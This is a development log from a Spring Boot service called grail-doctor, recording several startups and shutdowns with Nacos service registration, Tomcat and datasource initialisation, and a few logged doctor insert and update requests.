19:43:45.748 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Notify connected event to listeners.
19:43:45.748 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
19:43:45.748 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6420
19:43:45.956 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
19:43:47.699 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
19:43:47.700 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
19:43:47.700 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
19:43:47.839 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
19:43:50.936 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
19:43:50.937 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
19:43:50.937 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
19:43:51.780 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
19:43:53.328 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 008fa384-0b31-4fc0-b852-fe23700b7888
19:43:53.328 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] RpcClient init label, labels = {module=naming, source=sdk}
19:43:53.330 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
19:43:53.330 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
19:43:53.330 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
19:43:53.330 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
19:43:53.562 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698407033083_10.100.1.1_63219
19:43:53.562 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
19:43:53.562 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Notify connected event to listeners.
19:43:53.562 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6420
19:43:56.698 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
19:43:56.755 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
19:43:57.211 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Receive server push request, request = NotifySubscriberRequest, requestId = 1714
19:43:57.214 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [008fa384-0b31-4fc0-b852-fe23700b7888] Ack server push request, request = NotifySubscriberRequest, requestId = 1714
19:43:58.176 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.242 seconds (JVM running for 18.125)
19:43:58.184 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
19:43:58.185 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
19:43:58.186 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
19:43:58.369 [RMI TCP Connection(2)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
19:44:02.797 [http-nio-10009-exec-1] INFO c.g.d.c.DoctorController - [doctorInsert,54] - 功能:添加医生信息 URI:/doctor/doctorInsert 方法POST 参数:{"consultationPrice":"200","departmentId":1,"doctorCareer":"护士","doctorField":"肛肠科","doctorGender":1,"doctorHospital":"北京八维","doctorName":"王林涛","doctorPicture":"","personalProfile":"还好","replyContent":"","replyStatus":1,"userId":1}
20:01:14.904 [http-nio-10009-exec-4] INFO c.g.d.c.DoctorController - [doctorUpdate,68] - 功能:修改医生信息 URI/doctor/doctorUpdate 方法DoctorRequest(doctorId=3, doctorName=王林涛吃屎, doctorGender=1, doctorHospital=, doctorCareer=, doctorPicture=, personalProfile=, doctorField=, departmentId=1, replyStatus=1, replyContent=, userId=1, consultationPrice=1) 参数:{"consultationPrice":"1","departmentId":1,"doctorCareer":"","doctorField":"","doctorGender":1,"doctorHospital":"","doctorId":3,"doctorName":"王林涛吃屎","doctorPicture":"","personalProfile":"","replyContent":"","replyStatus":1,"userId":1}
20:02:35.448 [http-nio-10009-exec-6] INFO c.g.d.c.DoctorController - [doctorUpdate,68] - 功能:修改医生信息 URI/doctor/doctorUpdate 方法DoctorRequest(doctorId=3, doctorName=王林涛, doctorGender=1, doctorHospital=, doctorCareer=, doctorPicture=, personalProfile=, doctorField=, departmentId=1, replyStatus=1, replyContent=, userId=1, consultationPrice=1) 参数:{"consultationPrice":"1","departmentId":1,"doctorCareer":"","doctorField":"","doctorGender":1,"doctorHospital":"","doctorId":3,"doctorName":"王林涛","doctorPicture":"","personalProfile":"","replyContent":"","replyStatus":1,"userId":1}
20:07:56.029 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
20:07:56.068 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
20:07:56.399 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
20:07:56.399 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@7acaa2ad[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
20:07:56.399 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698407033083_10.100.1.1_63219
20:07:56.404 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@78080490[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 301]
20:07:56.530 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
20:07:56.533 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
20:07:56.537 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
20:07:56.537 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
20:08:03.531 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
20:08:05.274 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0
20:08:05.330 [main] INFO o.r.Reflections - [scan,232] - Reflections took 25 ms to scan 1 urls, producing 3 keys and 6 values
20:08:05.354 [main] INFO o.r.Reflections - [scan,232] - Reflections took 9 ms to scan 1 urls, producing 4 keys and 9 values
20:08:05.373 [main] INFO o.r.Reflections - [scan,232] - Reflections took 17 ms to scan 1 urls, producing 3 keys and 10 values
20:08:05.380 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
20:08:05.387 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
20:08:05.395 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
20:08:05.397 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
20:08:05.397 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f63cd0
20:08:05.397 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f63ee0
20:08:05.398 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
20:08:05.398 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
20:08:05.404 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:08:06.722 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698408486151_10.100.1.1_63703
20:08:06.722 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Notify connected event to listeners.
20:08:06.723 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:08:06.723 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [f0ceac90-6865-4b4a-88a4-b7e0021815b1_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
20:08:06.936 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
20:08:08.713 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
20:08:08.713 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
20:08:08.713 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
20:08:08.866 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
20:08:12.376 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
20:08:12.376 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
20:08:12.377 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
20:08:13.246 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
20:08:14.811 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of fad2bd05-8765-418c-b79f-aaf386e71d12
20:08:14.811 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] RpcClient init label, labels = {module=naming, source=sdk}
20:08:14.813 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
20:08:14.813 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
20:08:14.813 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
20:08:14.813 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:08:15.060 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698408494527_10.100.1.1_63749
20:08:15.060 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:08:15.060 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Notify connected event to listeners.
20:08:15.060 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
20:08:18.177 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
20:08:18.233 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
20:08:18.722 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Receive server push request, request = NotifySubscriberRequest, requestId = 1831
20:08:18.725 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [fad2bd05-8765-418c-b79f-aaf386e71d12] Ack server push request, request = NotifySubscriberRequest, requestId = 1831
20:08:19.667 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.886 seconds (JVM running for 18.811)
20:08:19.675 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
20:08:19.676 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
20:08:19.677 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
20:08:20.141 [RMI TCP Connection(4)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
20:10:23.743 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
20:10:23.783 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
20:10:24.110 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
20:10:24.111 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@24413f21[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
20:10:24.111 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698408494527_10.100.1.1_63749
20:10:24.114 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@2f68957e[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 38]
20:10:24.244 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
20:10:24.246 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
20:10:24.251 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
20:10:24.251 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
20:10:29.553 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
20:10:31.328 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0
20:10:31.373 [main] INFO o.r.Reflections - [scan,232] - Reflections took 23 ms to scan 1 urls, producing 3 keys and 6 values
20:10:31.395 [main] INFO o.r.Reflections - [scan,232] - Reflections took 10 ms to scan 1 urls, producing 4 keys and 9 values
20:10:31.414 [main] INFO o.r.Reflections - [scan,232] - Reflections took 18 ms to scan 1 urls, producing 3 keys and 10 values
20:10:31.422 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
20:10:31.429 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
20:10:31.437 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
20:10:31.439 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
20:10:31.440 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f63cd0
20:10:31.440 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f63ee0
20:10:31.440 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
20:10:31.441 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
20:10:31.447 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:10:32.944 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698408632134_10.100.1.1_62251
20:10:32.944 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Notify connected event to listeners.
20:10:32.944 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:10:32.945 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [1d870f5f-99c3-473e-853a-36cdb15c94bd_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
20:10:33.162 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
20:10:35.344 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
20:10:35.344 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
20:10:35.345 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
20:10:35.487 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
20:10:39.046 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
20:10:39.047 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
20:10:39.047 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
20:10:39.897 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
20:10:41.435 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 2beac475-d1a1-4d21-a141-5900fb6c7a51
20:10:41.435 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] RpcClient init label, labels = {module=naming, source=sdk}
20:10:41.436 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
20:10:41.436 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
20:10:41.437 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
20:10:41.437 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
20:10:41.668 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698408641144_10.100.1.1_62283
20:10:41.669 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
20:10:41.669 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Notify connected event to listeners.
20:10:41.669 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
20:10:44.801 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
20:10:44.860 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
20:10:45.367 [nacos-grpc-client-executor-7] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Receive server push request, request = NotifySubscriberRequest, requestId = 1848
20:10:45.369 [nacos-grpc-client-executor-7] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [2beac475-d1a1-4d21-a141-5900fb6c7a51] Ack server push request, request = NotifySubscriberRequest, requestId = 1848
20:10:46.295 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 18.561 seconds (JVM running for 19.647)
20:10:46.304 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
20:10:46.304 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
20:10:46.305 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
20:10:46.622 [RMI TCP Connection(5)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
20:12:58.560 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
20:12:58.614 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
20:12:58.942 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
20:12:58.942 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@450a2ae2[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
20:12:58.943 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698408641144_10.100.1.1_62283
20:12:58.945 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@3b267bdb[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 41]
20:12:59.075 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
20:12:59.077 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
20:12:59.081 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
20:12:59.081 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
20:13:03.717 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
20:13:05.467 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0
20:13:05.510 [main] INFO o.r.Reflections - [scan,232] - Reflections took 23 ms to scan 1 urls, producing 3 keys and 6 values
20:13:05.530 [main] INFO o.r.Reflections - [scan,232] - Reflections took 9 ms to scan 1 urls, producing 4 keys and 9 values
20:13:05.539 [main] INFO o.r.Reflections - [scan,232] - Reflections took 7 ms to scan 1 urls, producing 3 keys and 10 values
20:13:05.553 [main] INFO o.r.Reflections - [scan,232] - Reflections took 12 ms to scan 1 urls, producing 1 keys and 5 values
20:13:05.560 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
20:13:05.567 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
20:13:05.569 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
20:13:05.569 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [a6f4f46a-aec6-4341-ada4-4eac4a62097a_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f64550
